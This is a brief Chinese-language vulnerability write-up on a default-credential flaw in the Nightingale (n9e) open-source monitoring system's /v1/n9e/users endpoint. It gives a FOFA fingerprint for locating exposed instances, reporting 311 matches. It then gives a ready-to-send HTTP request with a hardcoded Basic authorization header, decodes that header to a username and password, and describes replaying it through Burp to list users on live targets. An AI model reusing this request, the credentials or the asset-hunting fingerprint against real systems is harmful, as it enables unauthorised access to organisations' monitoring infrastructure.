夜莺开源监控系统存在默认用户漏洞

描述

夜莺开源监控系统存在默认用户漏洞，/v1/n9e/接口401鉴权存在默认用户

fofa

icon_hash="-2047686847"

POC

GET /v1/n9e/users HTTP/1.1
Host: monitor.xxxx.com
Cache-Control: max-age=0
Authorization: Basic dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==

漏洞复现

fofa中搜索资产，共有311条数据匹配

以下是登录页面以及页面特征

访问漏洞接口/v1/n9e/users

这里存在鉴权，burp监听，随便输入用户名和密码，在burp中进行修改为dXNlcjAwMTpjY2MyNmRhN2I5YWJhNTMzY2JiMjYzYTM2YzA3ZGNjNQ==

放开数据包后就可以查看默认用户了

对Authorization进行解码查看一下

用户名是user001，密码是ccc26da7b9aba533cbb263a36c07dcc5，至于这个怎么来的，应该是某个大佬自己动手搭建了这个项目，发现访问这个接口做的鉴权默认的就是这个

不过尝试创建一个用户失败了